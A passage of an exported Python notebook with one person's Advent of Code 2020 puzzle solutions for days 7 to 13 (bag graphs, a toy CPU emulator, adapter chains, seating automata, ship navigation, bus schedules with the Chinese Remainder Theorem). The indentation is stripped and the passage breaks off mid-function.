print("Day 7 b")
# In[ ]:
edge_weights = nx.get_edge_attributes(graph, 'weight')
#for p in nx.all_simple_edge_paths(graph, 'shiny gold', "END"): # not available
seen_subpaths = []
for p in nx.all_simple_paths(graph, 'shiny gold', "END"):
log.debug(p)
for snode_idx in range(len(p)-1):
tup = tuple([p[snode_idx], p[snode_idx+1]])
subpath = tuple(p[0:snode_idx+2])
log.debug(f"subpath: {subpath}")
if not subpath in seen_subpaths:
seen_subpaths.append(subpath)
log.debug(" new subpath")
else:
log.debug(" already SEEN subpath")
log.debug(f" path-edge#{snode_idx}: {tup} {edge_weights[tup]}")
log.debug(seen_subpaths)
# In[ ]:
# see: [python - Getting subgraph of nodes between two nodes? - Stack Overflow](https://stackoverflow.com/questions/32531117/getting-subgraph-of-nodes-between-two-nodes)
def subgraph_between(graph, start_node, end_node):
paths_between_generator = nx.all_simple_paths(graph, source=start_node,target=end_node)
nodes_between_set = {node for path in paths_between_generator for node in path}
return( graph.subgraph(nodes_between_set) )
# In[ ]:
subgraph = subgraph_between(graph, 'shiny gold', 'END')
for p in subgraph.edges:
log.debug(p)
log.info("sub-paths for shiny gold:")
for p in nx.all_simple_paths(subgraph, 'shiny gold', "END"):
log.info(p)
# In[ ]:
edge_weights = nx.get_edge_attributes(graph, 'weight')
seen_subpaths = []
for p in nx.all_simple_paths(graph, 'shiny gold', "END"):
log.debug(p)
for start_idx in reversed(range(len(p)-2)):
seen = False
subpath = tuple(p[0:start_idx+2])
if not subpath in seen_subpaths:
seen_subpaths.append(subpath)
else:
seen = True
tup = tuple([p[start_idx], p[start_idx+1]])
w = edge_weights[tup]
log.debug(f" subedge={tup}, weight={w}; subpath={subpath}, seen={seen}")
# In[ ]:
# Personal solution to day 7 a UNFINISHED.
clr = 'shiny gold'
clr_edges = filter(lambda it: it[0]==clr, list(graph.edges))
for edge in clr_edges:
log.debug(f"edge={edge}, edge-weight={edge_weights[edge]}")
# In[ ]:
# "Inspiration" soltion, copied/stolen from user el-guish's solution in:
# [- 2020 Day 07 Solutions - : adventofcode](https://www.reddit.com/r/adventofcode/comments/k8a31f/2020_day_07_solutions/)
# Using recursion.
rules = open('in/day07.in').readlines()
def parse_rule(r):
parent, contents = r[:-2].split(' bags contain ')
childs = [parse_child_bag(c) for c in contents.split(',') if c != 'no other bags' and c != 'no other bag']
return (parent, childs)
def parse_child_bag(child_st):
cparts = child_st.split()
qty = int(cparts[0])
color = ' '.join(cparts[1:-1])
return (color, qty)
def required_contents(bag_color):
return sum(q + q * required_contents(color) for color, q in contains[bag_color] )
contains = dict(parse_rule(r) for r in test_str.split("\n"))
log.debug("test rules (parsed):", contains)
print("tests result", required_contents('shiny gold'))
contains = dict(parse_rule(r) for r in rules)
print("Day 7 b solution", required_contents('shiny gold'))
# ### Day 8: Handheld Halting
# In[ ]:
def read_prog(l):
outlst = aoc.map_list(lambda it: it.split(' '), l)
for instr in outlst:
instr[1] = int(instr[1])
return outlst
# In[ ]:
def run_cpu_prog(prog):
cpuct = 0
pptr = 0
prog_len = len(prog)
seen = []
acc = 0
while True:
cpuct += 1
if pptr in seen:
log.info(f"found inf-loop @cpuct={cpuct} @instr#={pptr} : {instr}")
break
elif pptr == prog_len:
log.info(f"found prog-term @cpuct={cpuct} @instr#={pptr} : {instr}")
break
else:
seen.append(pptr)
instr = prog[pptr]
op, par = instr
log.debug(f"instr#{cpuct} instr={instr}")
if cpuct > 10_000:
raise Exception("failsafe")
if op == 'nop':
pptr += 1
#log.debug(f" new pptr={pptr}")
elif op == 'acc':
acc += par
pptr += 1
#log.debug(f" new acc={acc}")
elif op == 'jmp':
pptr += par
#log.debug(f" jmp for={par} to={pptr}")
else:
raise Exception(f"unknown opcode in {instr}")
return acc
# In[ ]:
tests = """
nop +0
acc +1
jmp +4
acc +3
jmp -3
acc -99
acc +1
jmp -4
acc +6
""".strip().split("\n")
log.debug(tests)
test_prog = read_prog(tests)
log.debug(test_prog)
# In[ ]:
run_cpu_prog(test_prog)
# In[ ]:
ins = aoc.read_file_to_str('./in/day08.in').strip().split("\n")
prog = read_prog(ins)
print("Day 8 a solution: acc:", run_cpu_prog(prog))
# In[ ]:
print("Day 8 b")
# In[ ]:
def check_cpu_prog(prog):
prog_len = len(prog)
cpuct = 0
pptr = 0
seen = []
acc = 0
while True:
if pptr == prog_len:
log.debug(f"OK: prog terminates! @cpuct={cpuct} @instr#={pptr} : last-instr={instr}")
return True
cpuct += 1
instr = prog[pptr]
op, par = instr
#log.debug(f"instr#{cpuct} {instr}")
if pptr in seen:
log.debug(f"Fail: found inf-loop @cpuct={cpuct} @instr#={pptr} : {instr}")
return False
else:
seen.append(pptr)
if cpuct > 10_000:
raise Exception("failsafe")
if op == 'nop':
pptr += 1
#log.debug(f" new pptr={pptr}")
elif op == 'acc':
acc += par
pptr += 1
#log.debug(f" new acc={acc}")
elif op == 'jmp':
pptr += par
#log.debug(f" jmp for={par} to={pptr}")
else:
raise Exception(f"unknown opcode in {instr}")
return acc
# In[ ]:
print("test result: check-cpu-prog", check_cpu_prog(test_prog))
# In[ ]:
from copy import deepcopy
def check_prog_variations(prog):
base_prog = deepcopy(prog)
altinstrs = []
for idx, instr in enumerate(base_prog):
if instr[0] in ['nop', 'jmp']:
altinstrs.append([idx, instr])
log.debug(f"alternate instructions: {altinstrs}")
if check_cpu_prog(base_prog):
#log.debug("prog=", base_prog)
acc = run_cpu_prog(base_prog)
log.debug(f"prog ok, acc={acc}")
for elem in altinstrs:
#log.debug("elem:", elem)
idx, v = elem
instr, par = v
prog = deepcopy(base_prog)
if instr == 'nop':
prog[idx][0] = 'jmp'
elif instr == 'jmp':
prog[idx][0] = 'nop'
#log.debug(f"new-instr @{idx}={prog[idx][0]}")
#log.debug("new-prog=", prog)
if check_cpu_prog(prog):
acc = run_cpu_prog(prog)
log.info(f"prog ok, acc={acc}")
break
return acc
# In[ ]:
result = check_prog_variations(test_prog)
print("test result: check-prog-variations", result)
# In[ ]:
result = check_prog_variations(read_prog(ins))
print("Day 8 b result: check-prog-variations", result)
# ### Day 9: Encoding Error
# In[ ]:
tests = """
35
20
15
25
47
40
62
55
65
95
102
117
150
182
127
219
299
277
309
576
""".strip().split("\n")
# In[ ]:
from typing import List
def pp_lst(lst):
return "[" + str.join(',', aoc.map_list(str, lst)) + "]"
def check_xmas_data(xmas_data: int, preamble: List[int]) -> bool:
preamble_len = len(preamble)
#log.debug("[check_xmas_data] xmas_data:", xmas_data, ", preamble_len;:", len(preamble))
ok = False
for combi in itertools.combinations(preamble, 2): # for entries no combination with itself!
if sum(combi) == xmas_data:
ok = True
#log.info(f"[check_xmas_data] OK: xmas-data-elem {xmas_data} is sum of prev-elems:{combi}")
break
return ok
def check_xmas_data_seq(xmas_data_seq: List[int], preamble: List[int]) -> bool:
#log.debug("[check_xmas_data_seq] xmas_data_seq:", xmas_data_seq, ", preamble_len;:", len(preamble))
preamble_len = len(preamble)
all_ok = True
for xmas_data in xmas_data_seq:
#log.info(f"[check_xmas_data_seq] elem={xmas_data} preamble={pp_lst(preamble)}")
ok = check_xmas_data(xmas_data, preamble)
preamble.pop(0)
preamble.append(xmas_data)
#log.info(f" p appended={xmas_data}, removed={remvd}, preamble={str.join(',', lmap(str, preamble))}")
all_ok &= ok
return all_ok
# In[ ]:
preamble0 = list(range(1, 25+1)) # numbers 1..25
log.debug(preamble0)
# In[ ]:
assert( True == check_xmas_data(26, preamble0) )
assert( True == check_xmas_data(49, preamble0) )
assert( False == check_xmas_data(100, preamble0) )
assert( False == check_xmas_data(50, preamble0) )
# In[ ]:
preamble1 = flatten_list( [[20], list(range(1, 20)), list(range(21, 26))] )
log.debug(preamble1)
# In[ ]:
assert( True == check_xmas_data_seq([45, 26], preamble1) )
assert( False == check_xmas_data_seq([45, 65], preamble1) )
assert( True == check_xmas_data_seq([45, 64], preamble1) )
assert( True == check_xmas_data_seq([45, 66], preamble1) )
# In[ ]:
def verify_xmas_data_seq(xmas_data_rawseq: List[int], preamble_len=25) -> bool:
"""List `xmas_data_rawseq` contains the preamble as head."""
preamble = xmas_data_rawseq[0:preamble_len]
xmas_data_seq = xmas_data_rawseq[preamble_len:]
log.debug(f"[verify_xmas_data_seq] xmas_data_seq:{pp_lst(xmas_data_seq)}, preamble:{pp_lst(preamble)}")
preamble_len = len(preamble)
oks = []
for xmas_data in xmas_data_seq:
#log.info(f"[check_xmas_data_seq] elem={xmas_data} preamble={str.join(',', lmap(str, preamble))}")
ok = check_xmas_data(xmas_data, preamble)
oks.append([xmas_data, ok])
preamble.pop(0)
preamble.append(xmas_data)
return oks
# In[ ]:
raw_testdata = aoc.map_list(int, tests)
res = verify_xmas_data_seq(raw_testdata, preamble_len=5)
res = aoc.map_list(lambda it: it[0], aoc.filter_list(lambda it: it[1] == False, res))
log.info(f"test False results: {res}")
assert( [127] == res )
# In[ ]:
ins = aoc.map_list(int, aoc.read_file_to_list('./in/day09.in'))
log.debug(ins)
# In[ ]:
res = verify_xmas_data_seq(ins, preamble_len=25)
res = aoc.map_list(lambda it: it[0], aoc.filter_list(lambda it: it[1] == False, res))
log.info(f"found invalid number(s): {res}")
invalid_num = res[0]
print("Day 8 a solution:", invalid_num)
# In[ ]:
# see: [python - List all contiguous sub-arrays](https://stackoverflow.com/questions/41576911/list-all-contiguous-sub-arrays)
def get_all_windows(lst, min_win_len=1):
"""Generator yielding all sub-windows (contiguous sublists) of given list with min_win_len."""
for win_len in range(min_win_len, len(lst)+1):
for idx in range(len(lst)-win_len+1):
yield lst[idx:idx+win_len]
# In[ ]:
test_invalidnum = 127
raw_testdata2 = raw_testdata.copy()
raw_testdata2.remove(test_invalidnum)
for subl in get_all_windows(raw_testdata2):
if sum(subl) == test_invalidnum:
log.info(f"found fulfilling-window: {subl}")
break
# In[ ]:
ins2 = ins.copy()
ins2.remove(invalid_num)
for subl in get_all_windows(ins2):
if sum(subl) == invalid_num:
log.info(f"found fulfilling-window: {subl}")
min_elem = min(subl)
max_elem = max(subl)
solut = min_elem+max_elem
log.info(f"min, max, sum: {[min_elem, max_elem, solut]}")
break
# ### Day 10: Adapter Array
# In[ ]:
def solve10a(loi):
current = 0
remainders = loi.copy()
chain = [current]
jolts = []
for i in range(len(remainders)):
targets = filterl(lambda it: it >= current and it <= current + 3, remainders)
target = min(targets)
remainders.remove(target)
#log.debug(f"#{i} from={current} targets={targets}, target={target}, djolt={target-current}, remainders={remainders}")
chain.append(target)
jolts.append(target-current)
current = target
if len(remainders) == 0:
jolts.append(3) # final device 3 jolts higher than lasta dapter in chain
j1 = jolts.count(1)
j3 = jolts.count(3)
res = j1*j3
log.info(f"chain {aoc.cl(chain)} terminated ok, jolts={aoc.cl(jolts)}, j1#={j1}, j3#={j3}, res={res}")
return j1*j3
raise Exception("solution not found")
# In[ ]:
tests = """
16
10
15
5
1
11
7
19
6
12
4
""".strip().split("\n")
tests1 = aoc.map_list(int, tests)
log.debug(f"test1={tests1}")
res = solve10a(tests1)
aoc.assert_msg("test 1", 7*5 == res)
log.info(f"tests1 solution: {res}")
tests = """
28
33
18
42
31
14
46
20
48
47
24
23
49
45
19
38
39
11
1
32
25
35
8
17
7
9
4
2
34
10
3
""".strip().split("\n")
log.setLevel( logging.INFO )
tests2 = mapl(int, tests)
res = solve10a(tests2)
aoc.assert_msg("test 2", 220 == res)
log.info(f"tests2 solution: {res}")
# In[ ]:
ins = mapl(int, aoc.read_file_to_list('./in/day10.in'))
res = solve10a(ins)
log.info(f"Day 10 a solution: {res}")
# In[ ]:
import time
def find_paths(loi): # loi is a list of ints (input)
start_tm = int(time.time())
end_elem = max(loi)
partials = {0: [[0]]}
found_num = 0
current = 0
iter = 0
lastlevel_partials = 0 # just only for printing (debugging)
last_partials = [[0, 1]]
elems_avail = loi.copy()
for lvl in range(1, len(loi)+1):
last_partials_keys = mapl(lambda it: it[0], last_partials)
min_last_elem = min(last_partials_keys)
elems_avail = filterl(lambda it: it > min_last_elem, elems_avail)
filtered_elems = {}
last_partials_count = {}
for src in sorted(set(last_partials_keys)):
filtered_elems[src] = filterl(lambda it: it > src and it <= src + 3, elems_avail)
last_partials_count[src] = sum(mapl(lambda it: it[1], filterl(lambda it: it[0]==src, last_partials)))
partials_diff = len(last_partials_keys)-lastlevel_partials
needed_tm = int(time.time()) - start_tm
log.debug(f"level={lvl} @{needed_tm}s, found={found_num}, paths-diff={partials_diff:,} before-partials-#={len(last_partials):,}, min-last-elem={min_last_elem}, elems_avail#={len(elems_avail)}")
log.debug(f" last-partials-ct={last_partials_count}")
lastlevel_partials = len(last_partials)
partials = []
for partial in sorted(set(last_partials_keys)): #last_partials:
iter += 1
if iter % 100_000_000 == 0:
log.debug(f"at iter#={iter:,}, found#={found_num}, level={lvl}")
#if iter > 10_000_000_000: # FAILSAFE
# return found
targets = filtered_elems[partial]
for target in targets:
if target == end_elem:
if found_num % 100_000 == 0:
log.debug(f"at found# {found_num}")
found_num += last_partials_count[partial]
else:
partials.append( [target, last_partials_count[partial]] )
last_partials = partials
log.info(f"level={lvl} @{needed_tm}s, found={found_num}, paths-diff={partials_diff:,} before-partials-#={len(last_partials):,}, min-last-elem={min_last_elem}, elems_avail#={len(elems_avail)}")
return found_num
# In[ ]:
#log.setLevel( aoc.LOGLEVEL_TRACE )
log.debug(f"effective-log-level={log.getEffectiveLevel()}")
found = find_paths(tests1)
log.info(f"tests1 found {found} from {tests1}")
assert( 8 == found )
#found == 8
# In[ ]:
found = find_paths(tests2)
log.info(f"test2 found {found} paths") # 19208
assert( 19208 == found )
# In[ ]:
found = find_paths(ins)
log.info(f"Day 10 b solution: found {found} paths")
# ### Day 11: Seating System
# In[ ]:
#log.setLevel( aoc.LOGLEVEL_TRACE )
log.debug(f"effective-log-level={log.getEffectiveLevel()}")
# In[ ]:
import copy # for deepcopy
import hashlib
class CellularWorld:
def __init__(self, world, store_hashes=False):
"""World object constructor, world has to be given as a list-of-lists of chars."""
self.world = world
self.dim = [len(world[0]), len(world)]
self.iter_num = 0
log.info(f'[CellularWorld] new dim={self.dim}')
self.world = world
self.store_hashes = store_hashes
if self.store_hashes:
self.world_hashes = [self.get_hash()]
def repr(self):
"""Return representation str (can be used for printing)."""
return str.join("\n", map(lambda it: str.join('', it), self.world))
def set_world(self, world):
self.world = world
self.dim = [len(world[0]), len(world)]
def get_hash(self):
return hashlib.sha1(self.repr().encode()).hexdigest()
def get_neighbors8(self, x, y):
"""Get cell's surrounding 8 neighbors, omitting boundaries."""
log.trace(f"[CellularWorld]:get_neighbors8({x},{y})")
dim_x = self.dim[0]
dim_y = self.dim[1]
neighbors = ''
for nx in range(x-1, x+2):
for ny in range(y-1, y+2):
if (nx >= 0 and nx < dim_x) and (ny >= 0 and ny < dim_y) and not (nx == x and ny == y):
#log.info(f" neighb={[nx, ny]}")
neighbors += self.world[ny][nx]
return neighbors
def iterate(self, steps=1):
for i in range(steps):
world2 = copy.deepcopy(self.world)
for y in range(self.dim[1]):
for x in range(self.dim[0]):
val = self.world[y][x]
neighbors = self.get_neighbors8(x, y)
#log.trace(f"[{x},{y}]='{val}' nbs='{neighbors}'")
if val == 'L' and neighbors.count('#') == 0:
world2[y][x] = '#'
elif val == '#' and neighbors.count('#') >= 4:
world2[y][x] = 'L'
self.iter_num += 1
self.set_world(world2)
if self.store_hashes:
self.world_hashes.append(self.get_hash())
def find_cycle(self, max_iter=1_000):
"""This may only be called at initial state, before any previous iterations."""
seen = [world.repr]
for i in range(max_iter):
if i % 1_000 == 0:
log.debug(f"iter# {i}, still running")
world.iterate()
world_repr = world.repr()
if world_repr in seen:
start_idx = seen.index(world_repr)
log.info(f"found cycle @ iter={i+1}, seen-idx={start_idx}")
return([start_idx, i+1])
else:
seen.append(world_repr)
raise Exception("no world iter cycle found")
def find_stable(self, max_iter=1_000):
last_hash = self.get_hash()
#log.info(f"cworld initial state: (hash={last_hash}).")
#log.debug("world-repr=\n{cworld.repr()}")
for i in range(1, max_iter+1):
self.iterate()
this_hash = self.get_hash()
#log.debug(f"cworld state after iter#{i}, hash={this_hash}") #":\n{self.repr()}")
if this_hash == last_hash:
log.info(f"[CellularWorld:find_stable] BREAK on stable beginning @{i-1}")
return True
else:
last_hash = this_hash
raise Exception(f"[CellularWorld:find_stable] NO stable world iter found, after break on {max_iter} steps")
# In[ ]:
tests = """
L.LL.LL.LL
LLLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLLL
L.LLLLLL.L
L.LLLLL.LL
""".strip().split("\n")
tests = mapl(list, tests)
cworld = CellularWorld(tests) #, store_hashes=True)
cworld.find_stable()
seats_occ = cworld.repr().count('#')
log.info(f"test stable occupied-seats={seats_occ}")
# In[ ]:
ins = aoc.read_file_to_list('./in/day11.in')
ins = mapl(list, ins)
cworld = CellularWorld(ins)
cworld.find_stable()
seats_occ = cworld.repr().count('#')
log.info(f"Day 11 a solution: stable occupied-seats={seats_occ} after {cworld.iter_num} iterations")
# In[ ]:
print("Day 11 b")
class CellularWorldDirected(CellularWorld):
def iterate(self, steps=1):
for i in range(steps):
world2 = copy.deepcopy(self.world)
for y in range(self.dim[1]):
for x in range(self.dim[0]):
val = self.world[y][x]
neighbors = self.get_seen_occuppied_seats(x, y)
if val == 'L' and neighbors == 0:
world2[y][x] = '#'
elif val == '#' and neighbors >= 5:
world2[y][x] = 'L'
self.iter_num += 1
self.set_world(world2)
if self.store_hashes:
self.world_hashes.append(self.get_hash())
def get_seen_occuppied_seats(self, x, y):
directions = [
[1,0], [-1,0], [0,1], [0,-1],
[1,1], [-1,1], [1,-1], [-1,-1],
]
seen = 0
for d in directions:
#dseen = 0
dx, dy = d # directions
nx, ny = [x, y] # startpoint
while(True): # loop handling one direction vector
nx, ny = [nx+dx, ny+dy]
if nx < 0 or ny < 0 or nx >= self.dim[0] or ny >= self.dim[1]:
break
if "#" == self.world[ny][nx]:
#dseen += 1
seen += 1
break # in each direction, only 1 occupied can bee seen
elif "L" == self.world[ny][nx]:
break # empty seats block view
return seen
def find_cell(self, val):
"""Find first cell containing given value, return it's `[x, y]` coordinates."""
for y in range(self.dim[1]):
for x in range(self.dim[0]):
if self.world[y][x] == val:
return [x, y]
# In[ ]:
tests = """
.......#.
...#.....
.#.......
.........
..#L....#
....#....
.........
#........
...#.....
""".strip().split("\n")
tests = mapl(list, tests)
cworld = CellularWorldDirected(tests)
log.info(f"world repr:\n{cworld.repr()}")
c = cworld.find_cell('L')
n = cworld.get_seen_occuppied_seats(c[0], c[1])
log.info(f" empty spectator cell={c}, neib-#={n}")
assert( 8 == n )
# In[ ]:
tests = """
.............
.L.L.#.#.#.#.
.............
""".strip().split("\n")
tests = mapl(list, tests)
cworld = CellularWorldDirected(tests)
c = cworld.find_cell('L')
assert( 0 == cworld.get_seen_occuppied_seats(c[0], c[1]) )
# In[ ]:
tests = """
.##.##.
#.#.#.#
##...##
...L...
##...##
#.#.#.#
.##.##.
""".strip().split("\n")
tests = mapl(list, tests)
cworld = CellularWorldDirected(tests)
c = cworld.find_cell('L')
assert( 0 == cworld.get_seen_occuppied_seats(c[0], c[1]) )
# In[ ]:
tests = """
L.LL.LL.LL
LLLLLLL.LL
L.L.L..L..
LLLL.LL.LL
L.LL.LL.LL
L.LLLLL.LL
..L.L.....
LLLLLLLLLL
L.LLLLLL.L
L.LLLLL.LL
""".strip().split("\n")
tests = mapl(list, tests)
cworld = CellularWorldDirected(tests)
#for i in range(12):
# log.info(f"before: 0,0 val={cworld.world[0][0]} seen-occupied-#={cworld.get_seen_occuppied_seats(0,0)}")
# cworld.iterate()
# log.info(f"after {cworld.iter_num} iters, hash={cworld.get_hash()}: repr:\n{cworld.repr()}")
cworld.find_stable()
log.info(f"world stable after {cworld.iter_num} iters.") #": repr:\n{cworld.repr()}")
seats_occ = cworld.repr().count('#')
assert(26 == seats_occ)
log.info(f"test stable occupied-seats={seats_occ}")
# In[ ]:
cworld = CellularWorldDirected(ins)
cworld.find_stable()
log.info(f"world stable after {cworld.iter_num} iters.") #": repr:\n{cworld.repr()}")
seats_occ = cworld.repr().count('#')
log.info(f"Day 11 b solution: stable occupied-seats={seats_occ} after {cworld.iter_num} iters")
# ### Day 12: Rain Risks
# In[ ]:
directions = ['N', 'W', 'S', 'E']
direct_vecs = {'N': [0, 1], 'W': [-1, 0], 'S': [0, -1], 'E': [1, 0]}
def dist_manhattan(pos, pos_ref):
return abs(pos[0]-pos_ref[0]) + abs(pos[1]-pos_ref[1])
def move_ship(los):
ship_direct = 'E'
ship_vec = direct_vecs[ship_direct]
pos_ref = [0, 0]
pos = pos_ref.copy()
for cmd_str in los:
cmd, val = [cmd_str[0], int(cmd_str[1:])]
log.debug(f"cmd={[cmd, val]}")
if cmd in directions:
vec = direct_vecs[cmd]
pos[0] += val * vec[0]
pos[1] += val * vec[1]
log.debug(f" new pos: {pos}")
elif cmd == 'F':
pos[0] += val * ship_vec[0]
pos[1] += val * ship_vec[1]
log.debug(f" new pos: {pos}; ship_direct={ship_direct}")
elif cmd == 'R' or cmd == 'L':
turns = val//90
if cmd == 'R':
new_direct_idx = directions.index(ship_direct)-turns
elif cmd == 'L':
new_direct_idx = (directions.index(ship_direct)+turns) % len(directions)
log.debug(f"cur_direct={ship_direct}:{directions.index(ship_direct)}, new_direct_idx={new_direct_idx}; cmd={cmd_str}; turns={turns}")
ship_direct = directions[new_direct_idx]
ship_vec = direct_vecs[ship_direct]
log.debug(f" new ship_direct: {ship_direct}; from turn:{cmd}")
return dist_manhattan(pos, pos_ref)
# In[ ]:
tests = """
F10
N3
F7
R90
F11
""".strip().split("\n")
assert( 25 == move_ship(tests) )
# In[ ]:
ins = aoc.read_file_to_list('./in/day12.in')
res = move_ship(ins)
log.info(f"Day 12 a solution: {res}")
# In[ ]:
print("Day 12 b")
def move_ship_by_waypoint(los):
pos_ref = [0, 0]
waypt_pos = [10, 1]
pos = pos_ref.copy()
for cmd_str in los:
cmd, val = [cmd_str[0], int(cmd_str[1:])]
log.debug(f"cmd={[cmd, val]}")
if cmd in directions:
vec = direct_vecs[cmd]
dpos = [val * vec[0], val * vec[1]]
waypt_pos[0] += dpos[0]
waypt_pos[1] += dpos[1]
log.debug(f" new waypt-rpos: {waypt_pos}")
elif cmd == 'F':
dpos = [val * waypt_pos[0], val * waypt_pos[1]]
pos[0] += dpos[0]
pos[1] += dpos[1]
log.debug(f" new pos: {pos}; waypt-rpos={waypt_pos}")
elif cmd == 'R' or cmd == 'L': # rotate cartesian coordinates around origin in 90 degrees steps
if cmd_str in ['R90', 'L270']: # rotate RIGHT
cx, cy = waypt_pos
waypt_pos = [cy, -cx]
elif cmd_str in ['L90', 'R270']: # rotate LEFT
cx, cy = waypt_pos
waypt_pos = [-cy, cx]
elif cmd_str in ['L180', 'R180']: # invert 180
cx, cy = waypt_pos
waypt_pos = [-cx, -cy]
elif cmd_str in ['L180', 'R180']:
cx, cy = waypt_pos
waypt_pos = [-cx, -cy]
else:
raise Exception(f"unknown cmd_str={cmd_str}")
log.debug(f" new waypt-rpos={waypt_pos} from {[cx, cy]}")
dist = dist_manhattan(pos, pos_ref)
log.info(f"dist={dist}")
return dist
# In[ ]:
assert( 286 == move_ship_by_waypoint(tests) )
# In[ ]:
log.setLevel( logging.INFO )
res = move_ship_by_waypoint(ins)
log.info(f"Day 12 b solution: {res}")
# ### Day 13: Shuttle search
# In[ ]:
tests = """
939
7,13,x,x,59,x,31,19
""".strip().split("\n")
# In[ ]:
def find_shuttle(los):
min_wait_tm, min_bus = [99_999_999, -1]
start_tm = int(los[0])
shuttles = los[1].split(',')
log.info(f"[find_shuttle] {start_tm} {shuttles}")
for bus in shuttles:
if bus == 'x':
continue
bus = int(bus)
remainder = start_tm % bus
if remainder == 0:
wait_tm = 0
else:
wait_tm = bus - remainder
if wait_tm < min_wait_tm:
min_wait_tm, min_bus = [wait_tm, bus]
log.info(f"new_min: wait_tm={wait_tm}, 4bus={bus}, rmd={remainder}, res={wait_tm * bus}")
if wait_tm == 0:
break
log.debug(f"wait_tm={wait_tm}, 4bus={bus}, rmd={remainder}, res={wait_tm * bus}")
res = min_wait_tm * min_bus
log.info(f"MIN: wait_tm={min_wait_tm}, 4bus={min_bus}, res={res}")
return res
# In[ ]:
find_shuttle(tests)
# In[ ]:
ins = aoc.read_file_to_list('./in/day13.in')
find_shuttle(ins)
# In[ ]:
print("Day 13 b")
def find_shuttle_offsetted(s):
"""Semi-optimized brute-force algorithm implementation."""
start_tm = int(time.time())
log.info(f"[find_shuttle_offsetted] {s}")
offsets = {}
values = {}
for idx, val in enumerate(s.split(',')):
if val == 'x':
continue
val = int(val)
values[idx] =val # by offset
offsets[val] = idx # by value
srtvalues = list(reversed(sorted(list(values.values()))))
max_iterator = max(srtvalues)
max_iterator_offset = offsets[max_iterator]
log.info(f"max_it={max_iterator}->ofst={max_iterator_offset}; srtvalues={srtvalues}, offsets={offsets}, values={values}")
#values_len = len(srtvalues)
iterator2 = srtvalues[1]
iterator2_offset = offsets[iterator2]
iterator3 = srtvalues[2]
iterator3_offset = offsets[iterator3]
print_mod_interval = 100_000_000_000
next_print_mod = print_mod_interval
for t in map(lambda it: it * max_iterator -max_iterator_offset, range(1, 9_000_000_000_000_000//max_iterator)):
if (t + iterator2_offset) % iterator2 != 0 or (t + iterator3_offset) % iterator3 != 0:
continue # "FAST EXIT" this loop-item
if t >= next_print_mod: #idx >= next_print_mod:
log.info(f" calculating @{int(time.time())-start_tm:,}s ...: t#={t:,}")
next_print_mod += print_mod_interval
loop_ok = True
for val in srtvalues[3:]:
if (t + offsets[val]) % val != 0:
loop_ok = False
break
if loop_ok:
log.info(f"loop-OK for t#={t:,} @{int(time.time())-start_tm:,}s")
return t
raise Exception(f"No matching shuttle found after step t={t}")
# In[ ]:
test = "7,13,x,x,59,x,31,19"
assert( 1068781 == find_shuttle_offsetted(test) )
# In[ ]:
test = "17,x,13,19"
assert( 3417 == find_shuttle_offsetted(test) )
# In[ ]:
test = "67,7,59,61"
assert( 754018 == find_shuttle_offsetted(test) )
# In[ ]:
test = "67,x,7,59,61"
assert( 779210 == find_shuttle_offsetted(test) )
# In[ ]:
test = "67,7,x,59,61"
assert( 1261476 == find_shuttle_offsetted(test) )
# In[ ]:
test = "1789,37,47,1889"
assert( 1202161486 == find_shuttle_offsetted(test) )
# In[ ]:
print(f"known: solution larger than {100000000000000:,} <= 100000000000000")
# In[ ]:
def find_shuttle_offsetted6(s):
"""Semi-optimized brute-force algorithm implementation."""
start_tm = int(time.time())
log.info(f"[find_shuttle_offsetted] {s}")
offsets = {}
values = {}
for idx, val in enumerate(s.split(',')):
if val == 'x':
continue
val = int(val)
values[idx] = val # by offset
offsets[val] = idx # by value
srtvalues = list(reversed(sorted(list(values.values()))))
iterator1 = max(srtvalues)
iterator1_offset = offsets[iterator1]
log.info(f"max_it={iterator1}->ofst={iterator1_offset}; srtvalues={srtvalues}, offsets={offsets}, values={values}")
#values_len = len(srtvalues)
iterator2 = srtvalues[1]
iterator2_offset = offsets[iterator2]
iterator3 = srtvalues[2]
iterator3_offset = offsets[iterator3]
iterator4 = srtvalues[3]
iterator4_offset = offsets[iterator4]
iterator5 = srtvalues[4]
iterator5_offset = offsets[iterator5]
iterator6 = srtvalues[5]
iterator6_offset = offsets[iterator6]
print_mod_interval = 100_000_000_000
next_print_mod = print_mod_interval
for idx in range(1, 9_000_000_000_000_000//iterator1):
t = idx * iterator1 - iterator1_offset
if (t + iterator2_offset) % iterator2 != 0:
continue # "FAST EXIT" this loop-item
elif (t + iterator3_offset) % iterator3 != 0:
continue # "FAST EXIT" this loop-item
elif (t + iterator4_offset) % iterator4 != 0:
continue # "FAST EXIT" this loop-item
elif (t + iterator5_offset) % iterator5 != 0:
continue # "FAST EXIT" this loop-item
elif (t + iterator6_offset) % iterator6 != 0:
continue # "FAST EXIT" this loop-item
else:
if t >= next_print_mod: #idx >= next_print_mod:
log.info(f" calculating @{int(time.time())-start_tm:,}s ...: t#={t:,}; {t//(int(time.time())-start_tm):,} Ts/s")
next_print_mod += print_mod_interval
loop_ok = True
for val in srtvalues[6:]:
if (t + offsets[val]) % val != 0:
loop_ok = False
break
if loop_ok:
log.info(f"loop-OK for t#={t:,} @{int(time.time())-start_tm:,}s")
return t
raise Exception(f"No matching shuttle found after step t={t}")
# In[ ]:
in13b = ins[1]
#EXEC_RESOURCE_HOGS = True
if EXEC_RESOURCE_HOGS:
res = find_shuttle_offsetted6(in13b)
print(f"Day 13 b solution={res}")
# 2,448,348,017 Ts/s
# 3,163,888,049 Ts/s explicit t calc
else:
print("Omitting day 13 b resource expensive solution")
# In[ ]:
# Inspiration base: [- 2020 Day 13 Solutions - : adventofcode](https://www.reddit.com/r/adventofcode/comments/kc4njx/2020_day_13_solutions/)
# One solution: [adventofcode2020/main.py at master · r0f1/adventofcode2020](https://github.com/r0f1/adventofcode2020/blob/master/day13/main.py)
# Math Explanation: [Chinese Remainder Theorem | Brilliant Math & Science Wiki](https://brilliant.org/wiki/chinese-remainder-theorem/)
# a wonderful walk-through: [aoc/README.md at master · mebeim/aoc](https://github.com/mebeim/aoc/blob/master/2020/README.md#day-13---shuttle-search)
import numpy as np
#from math import prod # python 3.8 ?
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
#def modinv(a, m):
# g, x, y = egcd(a, m)
# if g != 1:
# raise Exception('modular inverse does not exist')
# else:
# return x % m
def modinv(x, m):
g, inv, y = egcd(x, m)
assert g == 1, 'modular inverse does not exist'
return inv % m
def pow38(g,w,p):
#log.info(f"pow38({g},{w},{p}) called")
if w >= 0:
return pow(g, w ,p)
else:
